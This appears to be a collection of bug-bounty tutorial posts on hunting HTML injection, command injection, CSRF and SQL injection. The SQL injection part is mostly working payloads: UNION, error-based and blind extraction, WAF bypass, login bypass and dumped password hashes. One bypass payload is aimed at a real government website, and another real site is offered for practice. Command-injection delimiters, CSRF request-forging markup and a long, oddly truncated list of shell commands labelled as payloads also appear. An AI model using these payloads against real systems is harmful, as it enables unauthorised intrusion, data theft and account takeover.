Welcome Hunters,

So Today i'am going to show you how to hunt for HTML Injection in a Web Application.
let's Continue,

What is HTML Injection?

So according to OWASP HTML injection is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.

In simple words HTML injection is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page.

Impact Of HTML Injection

➤ It can allow attacker to modify the page.

➤ DOM can be load there.

Steps To Find HTML Injection

➤ Find an input Parameter either GET based or POST based.

➤ If your input Reflect back to you on web page there may be HTML i.

➤  Execute any HTML code, if you succeed to execute any HTML code there. Then there is HTMLi

How To Attack 

➤ You need to find some vulnerable columns on the target website. We can use burp-suite – spider the website find out the parameters on the target website.

➤  input a word over there if its reflect back then thers a chance of HTMLi. Means that you have to find any input field and you have to try any word if your word refecting back to you so then there may be HTML Injection

➤ As we find out the vulnerable input here so we will try to inject HTMLi codes to effect the webpage.

➤ <h1> you have bin hacked by Geekyworld</h1>

➤ <h1></h1> -  are the headers of the body in HTML code or its use for managing the web interface

How To Hunt For HTML Injection (HTMLi) Practical Demonstration 

➤ GET BASE Through URL cat=1 place 1 by hello

So it will reflect on the web page.We can try this to effect the web page.

➤ <h1> you have bin hacked by Cybersecbroo</h1>

➤ POST base – Through comment field

So we will try to inject the HTMLi code in the Name & Comment field if its reflect back the variables so we will try the SCRIPT So it will reflect on the web page.

We can try this to effect the web page.

➤ <h1> you have bin hacked by Cybersecbroo</h1>

How To Hunt For HTML Injection (HTMLi) Practical Demonstration 

How To Hunt For HTML Injection (HTMLi) Practical Demonstration 

So this was the practical demonstration of how to hunt for HTML Injection i hpoe you will enjoy this and it will help to hunt vulnerability more quickly.

If you find any error or mistake please let me know in the commant box as well as you can send me your query by contacts us section 

Thank you Happy Hunting,

Follow Us on

Facebook: Cybersec_broo

Instagram: Cybersec_broo

How To Hunt For Command Injection Step by Step (CI)?

Welcome Hunter's

Today we are going to talk about Command Injection (CI) which is the critical vulnerability according to (OWASP TOP 10)

Background Concept of Command Injection:

Operating system command injection vulnerability arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell.

Meta characters to modify the command that is executed and inject arbitrary further commands that will be executed by the server.

Impact of Command Injection

By exploiting a command injection vulnerability an attacker can abuse the function to inject his own operating system commands.This means that he can easily take complete control over a web server.

Example of Command Injection 

➤ A common function exists that passes an ip address the user specifies to the system's ping command. Therefore if the user specifies 127.0.0.1 as an ip address, the command will look like this:

  ping -c5 127.0.0.1

➤ Since it is possible to break out of the ping command or provoke an eror with useful information the attacker can use this functionality to execute his own commands. An example for adding a second system command could look like this:

ping -c5 127.0.0.1; id

How To find Command Injection?

➤ Use Delimiter to Break or continue the execution of CMDs there

Delimiter List

➤ ; ^ &

➤ &&

➤ ||

➤ %0D

➤ %0A , \n

➤ <

Exploitation of Command Injection 

➤ Find a input field whose interacting with operating system shell.

➤ Try to execute and system shell commands with delimiter.

Examples

➤ ;ls

➤ &&ls

➤ ||ls 

Practice:

➤ DVWA And Multillidae

➤ Live Site: http://projects.knmi.nl

Note:  We can use burp suite for finding parameter flaw to execute Command injection in target website. Again, we will use spider for crawling the website, repeater to modify our codes, and Intruder to brute force attack to the target website.

Command injection is get based so try to find out the parameter with flaw with some value.

Automated tool for Command Injection

https://github.com/commixproject/commix

Commix is a python based tool to execute OS commands automatically

Command Injection Payloads

lftp

lftpget

link

ln

loadkeys

locale

locate

lockfile

logger

login

logname

logrotate

look

losetup

lpadmin

lpinfo

lpmove

lpq

lpr

lprm

lpstat

ls

lsattr

lsmod

lspci

lsusb

m4

mail

mailq

mailstats

mailto

make

makedbm

makemap

man

manpath

mattrib

mbadblocks

mcat

mcd

mcopy

md5sum

mdel, mdeltree

mdir

mdu

merge

mesg

metamail

metasend

mformat

mimencode

minfo

mkdir

mkdosfs

mke2fs

mkfifo

mkfs

mkfs.ext3

mkisofs

mklost+found

mkmanifest

mknod

mkraid

mkswap

mktemp

mlabel

mmd

mmount

mmove

modinfo

modprobe

more

mount

mountd

mpartition

mpg123

mpg321

mrd

mren

mshowfat

mt

mtools

mtoolstest

mtype

mv

mzip

named

namei

nameif

netstat

newaliases

newgrp

newusers

nfsd

nfsstat

nice

nm

nohup

nslookup

nsupdate

objcopy

objdump

od

openvt

passwd

paste

patch

pathchk

perl

pidof

ping

pinky

pmap

portmap

poweroff

pppd

pr

praliases

printenv

printf

ps

ptx

pwck

pwconv

pwd

python

quota

quotacheck

quotaoff

quotaon

quotastats

raidstart

ramsize

ranlib

rarpd

rcp

rdate

rdev

rdist

rdistd

readcd

readelf

readlink

reboot

reject

rename

renice

repquota

reset

resize2fs

restore

rev

rexec

rexecd

richtext

rlogin

rlogind

rm

rmail

rmdir

rmmod

rndc

rootflags

route

routed

rpcgen

rpcinfo

rpm

rsh

rshd

rsync

runlevel

rup

ruptime

rusers

rusersd

rwall

rwho

rwhod

sane-find-scanner

scanadf

scanimage

scp

screen

script

sdiff

sed

sendmail

sensors

seq

setfdprm

setkeycodes

setleds

setmetamode

setquota

setsid

setterm

sftp

sh

sha1sum

showkey

showmount

shred

shutdown

size

skill

slabtop

slattach

sleep

slocate

snice

sort

split

ssh

ssh-add

ssh-agent

sshd

ssh-keygen

ssh-keyscan

stat

statd

strace

strfile

strings

strip

stty

su

sudo

sum

swapoff

swapon

sync

sysctl

sysklogd

syslogd

tac

tail

tailf

talk

talkd

tar

taskset

tcpd

tcpdump

tcpslice

tee

telinit

telnet

telnetd

test

tftp

tftpd

time

tload

tmpwatch

top

touch

tr

tracepath

traceroute

troff

true

tset

tsort

tty

tune2fs

tunelp

ul

umount

uname

uncompress

unexpand

unicode_start

unicode_stop

uniq

uptime

useradd

userdel

usermod

users

usleep

uudecode

uuencode

uuidgen

vdir

vi

vidmode

vim

vmstat

volname

w

wall

warnquota

watch

wc

wget

whatis

whereis

which

who

whoami

whois

write

xargs

xinetd

yacc

yes

ypbind

ypcat

ypinit

ypmatch

yppasswd

yppasswdd

yppoll

yppush

ypserv

ypset

yptest

ypwhich

ypxfr

zcat

zcmp

zdiff

zdump

zforce

zgrep

zic

zless

zmore

znew

a

arp

assoc

at

atmadm

attrib

bootcfg

break

cacls

call

change

chcp

chdir

chkdsk

chkntfs

cipher

cls

cmd

cmstp

color

comp

compact

convert

copy

cprofile

cscript

date

defrag

del

dir

diskcomp

diskcopy

diskpart

doskey

driverquery

echo

endlocal

eventcreate

eventquery

eventtriggers

evntcmd

exit

expand

fc

filter

find

findstr

finger

flattemp

for

format

fsutil

ftp

ftype

getmac

goto

gpresult

gpupdate

graftabl

help

helpctr

hostname

if

ipconfig

ipseccmd

ipxroute

irftp

label

lodctr

logman

lpq

lpr

macfile

mkdir

mmc

mode

more

mountvol

move

msiexec

msinfo32

nbtstat

net

netsh

netstat

nslookup

ntbackup

ntcmdprompt

ntsd

openfiles

pagefileconfig

path

pathping

pause

pbadmin

pentnt

perfmon

ping

popd

print

prncnfg

prndrvr

prnjobs

prnmngr

prnport

prnqctl

prompt

pushd

query

rasdial

rcp

recover

reg

regsvr32

relog

rem

rename

replace

rexec

rmdir

route

rsh

rsm

runas

sc

schtasks

secedit

set

setlocal

shift

shutdown

sort

start

subst

systeminfo

sfc

taskkill

tasklist

tcmsetup

telnet

tftp

time

title

tracerpt

tracert

tree

type

typeperf

unlodctr

ver

verify

vol

vssadmin

w32tm

winnt

winnt32

wmic

xcopy

So this was the tutorial on Command Injection I hope it would be helpful for you guys to hunt bugs more quickly.

If you have any query you can put in the comment box. If you find any error or mistake please let me know either you can put in the comment section or Email: rajeshsahan507@gmail.com

Thank you happy hunting.

Follow us on 

Facebook: Cybersec_broo

Instagram: Cybersec_broo

How To Hunt For Cross Site Request Forgery

Welcome Hunters,

➤ Cross Site request forgery (CSRF) is an attack that forces an end user to execute unwanted actions on web application in which they’re currently authenticated.

➤ CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request.

➤ With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing.

➤ If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth.

 If the victim is an administrative account, CSRF can compromise the entire web application.

Why Does a CSRF Attack Work?

CSRF attacks works because the website never verifies whether the request came from a legitimate user: instead it just verifies that the request came form the browser of the authorized user.

How CSRF Attack works

Steps

➤ A user is authenticated on a website say hackerone.com

➤ The attacker tricks the victim into visiting his controlled domain say attacker.com

The attacker.com contains the malicious code which actually sends a request to hackerone.com to perform a specific action say changing victim website language.

➤ Hackerone.com assumes that request was sent from the victim's browser and does not verify it and hence changes the victim's lamguage

Note: So, in CRSF we will create a fake page of the victim website.

Because most off the form are based on POST base so we will try to make a forum.

Tool: Burp Suite

We will create a fake page and try to send it to the victim so if the victim response to that server there might a chance of the input credentials of the target.

Injection point for CSRF – Cross site request forgery

 CSRF can be GET based

 The function will call through the URL.

Genuine:   - http://testphp.vulnweb.com/listproduct.php?cat=1

Fake URL: -   http://testphp.vulnweb.com/listproduct.php?cat=Yourhacked!

If you send this one to your victim and if he click on this link we can generate a malicious page with the tag on it.

Get Base CSRF on Logout.

In this case we will sent a link to the victim *logout.php* If the victim click on that link so the victim session will logout because we have sent him the link of *logout.php* of the same server.

Link: -   http://testphp.vulnweb.com/logout.php

  

CSRF can be POST based 

The function will call through the POST form example: A fake login forum or a fake page.

https://support.portswigger.net/customer/portal/articles/1965674-using-burp-to-test-for-cross-site-request-forgery-csrf-

Get Based  CSRF Example

Let's assume that the website geekyworld.in utilizes a GET request to change the password. The request looks like the following

http://geekyworld.in/password.php?newpass=geeky@&confpass=world

The attacker can now modify the new pass and confpass parameters with his own password and forces the victim's browser to perform a GET request and hence the password would be changed to what the attacker set up. The code for forcing the victim's  browser to make a get request would look something like this:

<img src="http://geekyworld.in/password.php?newpass=geeky&confpass=world" width="100" height="100">

Note: I hope you guys have the knowledge of HTML because i am not going to explain it if not you have to learn it if you wanna be a Bug Bounty Hunter 

CSRF Protection Technique 

➤ Referrer-Based Checking

➤ Anti-CSRF Tokens

➤ Brute Forcing Weak Anti CSRF Token Algorithm

➤ Tokens Not Validated Upon server

➤ Analyzing Weak Anti CSRF Tokens Strength

--------------------------------------------------------------------------------------------------------------------------

So i hope this would be helpful for you to hunt vulnerability more quickly. if you find any mistake please let me know in the comment box or here rajeshsahan507@gmail.com

Thank you and happy Hunting keep shining 

Follow us on 

facebook: @Cybersec_broo

Instagram: @Cybersec_broo

To get regular updates of Ethical hacking stuffs

How to Hunt For SQL Injection learn Practically with background Concept

Welcome Hunters,

 SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.

When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL Query's syntax is incorrect. Blind SQL injection is nearly identical to normal SQL Injection, the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL Injection vulnerability more difficult, but not impossible

Backgroung Concept About SQL Injection

* How SQL Injection works

➤ In order to run malicious SQl queries against a database server an attacker must first find an input within the web application that is included inside of an SQL query

➤ In order for an SQL Injection attack to take place the vulnerable website needs to directly include user input within an SQl statement. An attacker can then insert a payload that will be included as part of the SQL query and run against the database server.

Note:  All the process works in background in SQLI we try to retrieve data from the backend to gain credentials related to the target website.

Injection point For SQL Injection

 ➤ SQL Injection can be GET Based

 ➤ SQL Injection can be POST Based

 ➤ SQL Injection can be Header Based

 ➤ SQL Injection can be  Cookie Based

Note: To execute your SQLI queries you have to find some input forum to execute the commands.

➤ SQL Injection GET based

The attacker has to attack through the URLS parameters to execute the commands.

Example- www.any.com/filename.programmning?parameter=value

➤ SQL Injection POST based

Attacker have to find any html forum that may execute sqli query.

Example: Signup form, login form, etc.

➤ SQL Injection HEADER based

In the process we have to execute the SQLI commands through the headers parameters in the target website as we have to look for – 

Example: Referrer | User-Agent | Location | Host.

➤ SQL Injection Cookie Based

In this process we have to execute the command through with the COOKIE Parameters to accomplish our target. (We have to find the cookies from the web browser)

for this just visit on the any website and try to intercept request through Burp Suite and put backslash in the end of the cookie if you find any error in the response related to SQL the there may be SQL Injection.

Note: You can use single quote (') as well as double quote (") to break the sql statement

Example: Cookie: username:sdh@#$;

Now i hope you have an basic idea about what is SQl injection and how many types of SQL Injection are there.

And how to find SQl Injection Now we will see how to fix the query of sql statement because query fixing is the second step of SQL injection after find out the injection point.

Lets Continue,

Learn SQL Injection query Fixing

➤ Identify SQL Injection vulnerability

'

"

\

')

")

➤ Balance the query

http://192.168.1.103/sqli-labs-master/Less-1/?id=1 {front end}

select id ='id' where name ='xyz' {background}

How to fix

Basically you need to just put the -- + at the end of the vulnerable parameter after single quote or double quote to balance the query (that is used in the MySQl as a comment)

http://192.168.1.103/sqli-labs-master/Less-1/?id=1'   --  

select id ='1'    --  ' where name ='xyz' {background}

In Background

select id=1  --  where name =xyz

how to fix query

http://192.168.1.103/sqli-labs-master/Less-2/?id=1   --  

Find total no of vulnerable columns

Order by 1{same page }

Order by 2 {same page }

Order by n {different page }

There is n-1 columns are Present

http://192.168.1.103/sqli-labs-master/Less-1/?id=1' order by 1  --   

Note:

 ➤ Order By: This is a keyword used in mysql to display the result of sorted columns

In a similar manners we can use "Group By" keyword to determine the number of columns in case the Order By keyword does not works or it is blacklisted by WAF (Web Application Firewall).

Find exact no of vulnerable columns out of these n-1

 union all select 1,2,...n-1

Example:

union all select 1,2,3

select id=-1' union all select 1,2,3  --  where name =xyz

executed - http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,2,3 --  

 Execute any database sqli query there 

On that reflected Number

Example: Database()

version()

user()

Executed - http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,database(),3 --  

http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,database(),user() --  

--------------------------------------------------------------------------------------------------------------------------------------------

Situation you are getting error but you are not getting output of union sqli statement in that case there may error based sqli or may be double query based sql injection.

http://192.168.1.103/sqli-labs-master/Less-5/?id=-1'  --  

error/double based sqli query -> hackbar->error/double->get database

--------------------------------------------------------------------------------------------------------------------------

Blind SQL Injection

Blind Boolean Based SQL Injection

and 1=1 {true }

and 1=2 {false }

and "a"="b"

and database()="xyz"

We can not assume the database

and sub string(database(),1,1)="a"

http://192.168.1.103/sqli-labs-master/Less-8/?id=1'    and substring(database(),1,1)="s"  --   {true vale that means first character of first database is s}

http://192.168.1.103/sqli-labs-master/Less-8/?id=1'    and substring(database(),2,1)="e"  --   {true second character of first database is e}

Blind Time Based SQL Injection

 ' and sleep(10) --  

" and sleep(10) --  

') and sleep(10) --  

how to extract database for blind time based sqli

' and sleep(10) and 1=1 --  

i gave http://192.168.1.103/sqli-labs-master/Less-9/?id=1'   and sleep(10) and database()="security" --   its sleeping that’s means

http://192.168.1.103/sqli-labs-master/Less-9/?id=1'   and sleep(10) and database()="xyz" --   

(Its not sleeping for 10 sec)

Exploitation of GET Based sqli

1. Database List -

hackbar->union->database->group_concat

information_schema

challenges

dvwa

MetasploitMySQLowasp10

security

tikiwiki

tikiwiki195

2.Find tables of a database -dvwa

hackbar->union->tables->group_concat

guestbook

users

3. Find columns of a table - guestbook

comment_id

comment

name

4. Data of that columns

name,comment

hackbar->union->data->group_concat

name,"<------>",comment,"---->",third

Error Based Double Query Exploitaion

What about other Database for if want to fetch remaining database you have to increase first value of first limit

LIMIT  1,1 - challenges

LIMIT  2,1 - dvwa

LIMIT 3,1 - metasploit

tables

Default Tables

LIMIT  0,1 -  guestbook

LIMIT  1,1 - users

LIMIT  2,1 -- you are not getting anything that means there is only two tables

columns for double query based

LIMIT  0,1   - user_id

LIMIT  1,1.   ---  first name

LIMIT  2,1)). --- last_name

LIMIT  3,1)). ---- user

LIMIT  4,1)).  --- password

LIMIT  5,1)). -- avatar

LIMIT  0,1)). ---- nothing

Data of these columns

user        password

admin 5f4dcc3b5aa765d61d8327deb882cf99

Gordon e99a18c428cb38d5f260853678922e03

1337 8d3533d75ae2c3966d7e0d4fcc69216b

Pablo

Post Based SQLI

Balance the query

' --  

Problem is not working with post based instead of  + use space (  ) or you can also use # to fix (#) is also used for comment out part of sqli query. 

-- or # 

Find total no of vulnerable columns

order by 1

find exact no of vulnerable columns

'  union all select 1,2  #

Execute database query

'  union all select database(),user()  #

Less -12

") union all select 1,2 #

") union all select database(),user() #

Blind boolean post based SQL Injection

'  OR 1=1  #

" OR 1=1 #

') OR 1=1 #

") OR 1=1 #

'  OR database()="security"  #

'  OR sub string(database(),1,1)="a"  #

'  OR sub string(database(),1,1)="s"  #

First character of database is s

'  OR substring(database(),2,1)="e"  #

Second character of database is e 

Blind time based

' OR sleep(10) #

" OR sleep(10) #

') OR sleep(10) #

") OR sleep(10) # {worked}

") OR sleep(10) and 1=1  #

") OR sleep(10) and substring(database(),3,1)="a"  #

application is sleeping when we fired this

") OR sleep(10) and substring(database(),3,1)="c"  #

That means third character of database is c 

Exploitation of POST Based SQLI

inject database query

1. Database list

hackbar -> union -> database-> group_concat

' union all select (SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),2 #

information_schema

challenges

dvwa

MetasploitMySQLowasp10

security

tikiwiki

tikiwiki195

2. Find table of a database - security

' union all select (SELECT  GROUP_CONCAT(table_name  SEPARATOR  0x3c62723e)  FROM  INFORMATION_SCHEMA.TABLES  WHERE  TABLE_SCHEMA=0x7365637572697479),2 #

E-Mails

referrersuser-agents

users

3. Find columns of a table - users

hackbar->union->columns->group_concat

' union all select (SELECT  GROUP_CONCAT(column_name  SEPARATOR  0x3c62723e)  FROM  INFORMATION_SCHEMA.COLUMNS  WHERE  TABLE_NAME=0x7573657273),2 #

user_id

first_name

last_name

user

password

avatar

id

username

password

4. Data of these columns - user, password

user,"<----->“, password

' union all select 1,(SELECT  GROUP_CONCAT(username,"<----->",password  SEPARATOR  0x3c62723e)  FROM  security.users) #

Error Based Double Query Exploitation Post Method

')   AND(SELECT  1  from(SELECT  COUNT(*),CONCAT((SELECT  (SELECT  (SELECT  DISTINCT  CONCAT(0x7e,0x27,CAST(schema_name  AS  CHAR),0x27,0x7e)  FROM  INFORMATION_SCHEMA.SCHEMATA  WHERE  table_schema!=DATABASE()  LIMIT  3,1))  FROM  INFORMATION_SCHEMA.TABLES  LIMIT  0,1),  FLOOR(RAND(0)*2))x  FROM  INFORMATION_SCHEMA.TABLES  GROUP  BY  x)a)  AND  1=1 #

Cookie Based SQLI

target - testphp.vulnweb.com

Balance Query

'  --

' and 'x'='x

select login='test/test'  and 'x'='x   ' where something other part of query

-------------------------------------------

Header Based sqli

Balance Query

' --

' and 'a'='a

select referrer='value ' OR SLEEP(5) and 'a'='a ' something other part of query

-------------------------------------------

WAF-Web application firewall by passing

Earlier i tried

' order by 1 --+

When I tried

' union all select 1,2,3,4,5,6,7 --+

I got not acceptable error

Either union may be illegal keyword may be all will be illegal input select

illegal word (word)= /*!12345word*/

' /*!12345union*/ all select 1,2,3 --+

http://multan.gov.pk/page.php?data=-2' /*!12345union*/ all select 1,2,database(),4,5,6,7 --+

Now exploit this

all database list

hackbar->union->database->group_concat

on any reflect no

(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)

' /*!12345union*/ all select 1,2,(SELECT+/*!12345GROUP_CONCAT*/(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),4,5,6,7 --+

Authentication Bypassing through SQLI

Let’s assume background of login page

select username ='value1'&password='value2' where some other part of query

value1 = '   OR 1=1 --

select username =''   OR 1=1 -- '&password='value2' where some other part of query

value1= 1' OR '1'='1

select username ='1' OR '1'='1 '&password='value2' where some other part of query 

So guys this was all about SQl Injection which the most critical vulnerability in these days in the web applications.

I hope this would be helpful for you guys to hunt more quickly if you find any grammar error please let me know in the comment box as well as you can send it on the mail attached in the author section.

Thank you happy Hunting

Resource from Hunter 1.0: Vikash Chaudhary